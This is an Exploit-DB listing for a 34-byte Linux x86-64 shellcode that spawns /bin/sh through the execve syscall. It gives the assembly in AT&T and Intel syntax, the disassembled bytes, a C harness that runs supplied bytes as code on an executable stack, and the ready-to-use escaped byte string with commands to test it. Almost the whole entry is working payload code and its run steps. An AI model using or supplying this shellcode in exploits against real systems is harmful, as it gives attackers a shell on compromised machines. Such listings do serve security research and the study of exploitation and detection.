Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)

EDB-ID:

38150

CVE:

N/A




Platform:

Linux_x86-64

Date:

2015-09-11


# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach)
# Date: 2015-09-10
# Exploit Author: Fanda Uchytil
# Version: 1
# Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian)


AT&T VERSION (easier to debug)
------------------------------

# execve("/bin//sh", NULL, NULL) through the raw Linux x86-64 syscall ABI.
# ABI:   syscall number in rax, args in rdi, rsi, rdx (r10/r8/r9 unused here).
# In:    nothing beyond a writable stack at rsp.
# Out:   does not return on success (process image replaced); on failure
#        rax = -errno and execution simply continues past `syscall` into
#        whatever bytes follow this block, since nothing here handles that.
# Clobb: rax, rdi, rsi, rdx, flags; the `syscall` instruction itself also
#        clobbers rcx and r11.
# Stack: 16 bytes pushed (an all-zero qword, then the 8-byte path), never popped.
.global _start
.text
_start:
    # int execve(const char *filename, char *const argv[], char *const envp[]);
    xor     %rax, %rax
    add     $59, %rax                   # rax = 59 = __NR_execve on Linux x86-64
    xor     %rdi, %rdi
    push    %rdi                        # 8 zero bytes: NUL terminator for the path pushed next
    mov     $0x68732F2f6e69622F, %rdi   # "/bin//sh" little-endian; the extra '/' pads it to 8 bytes
    push    %rdi                        # path now at [rsp], terminated by the zero qword above it
    lea     (%rsp), %rdi                # filename = rsp (same effect as mov %rsp, %rdi)
    xor     %rsi, %rsi                  # argv = NULL
    xor     %rdx, %rdx                  # envp = NULL
    syscall
    # NOTE(review): execve with a NULL argv is accepted by Linux, though newer
    # kernels appear to log a warning for it; a NULL argv/envp pair together with
    # the 8-byte "/bin//sh" immediate is what execve auditing and shellcode
    # signatures tend to key on when detecting this payload.


$ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt
$ ./shellcode_atnt
$ gdb -q ./shellcode_atnt


Disassembly of section .text:
  4000d4:       48 31 c0                xor    %rax,%rax
  4000d7:       48 83 c0 3b             add    $0x3b,%rax
  4000db:       48 31 ff                xor    %rdi,%rdi
  4000de:       57                      push   %rdi
  4000df:       48 bf 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rdi
  4000e6:       2f 73 68
  4000e9:       57                      push   %rdi
  4000ea:       48 8d 3c 24             lea    (%rsp),%rdi
  4000ee:       48 31 f6                xor    %rsi,%rsi
  4000f1:       48 31 d2                xor    %rdx,%rdx
  4000f4:       0f 05                   syscall




INTEL VERSION
-------------

    ; Same execve("/bin//sh", NULL, NULL) sequence as the AT&T version, in NASM syntax.
    ; No section or label: this is assembled flat (the nasm command below passes no
    ; -f, so the default bin format applies) to obtain the raw 34-byte string.
    ; Clobbers rax, rdi, rsi, rdx, flags; syscall additionally clobbers rcx, r11.
    ; Stack: 16 bytes pushed (zero qword, then the path), never popped.
    BITS 64
    xor rax, rax
    add rax, 59                       ; rax = __NR_execve (59) on Linux x86-64
    xor rdi, rdi
    push rdi                          ; zero qword: NUL terminator for the path pushed next
    mov rdi, 0x68732F2f6e69622F       ; "/bin//sh" little-endian, 64-bit immediate (movabs)
    push rdi                          ; path now at [rsp], NUL-terminated by the push above
    lea rdi, [rsp]                    ; filename = rsp
    xor rsi, rsi                      ; argv = NULL
    xor rdx, rdx                      ; envp = NULL
    syscall                           ; no return on success; on failure rax = -errno and
                                      ; execution runs off the end of these bytes


$ nasm shellcode.a      # no -f given, so NASM's default bin format: the raw bytes are written to ./shellcode




SHELLCODE_TEST.C
----------------

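  /*
   * Test harness: treats argv[1] as machine code and calls it.
   *
   * argv[1] lives on the initial process stack, which is why the build
   * command below links with -z execstack; without an executable stack
   * the indirect call faults.  The object-pointer -> function-pointer
   * cast is not ISO C but is what Linux/x86-64 compilers accept here.
   *
   * Returns whatever the called code returns, or 2 when no argument was
   * given (instead of dereferencing argv[1] == NULL).
   */
  int main(int argc, char **argv) {
      if (argc < 2) {
          return 2;                                   /* usage: shellcode_test <bytes> */
      }
      int (*f)(void) = (int (*)(void)) argv[1];       /* prototyped pointer: no implicit-int style */
      return (*f)();
  }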


$ gcc -o shellcode_test shellcode_test.c -z execstack     # or use `execstack(8)` before command below
$ ./shellcode_test "$(cat shellcode)"




STRING
------

$ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g'
\48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05

$ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"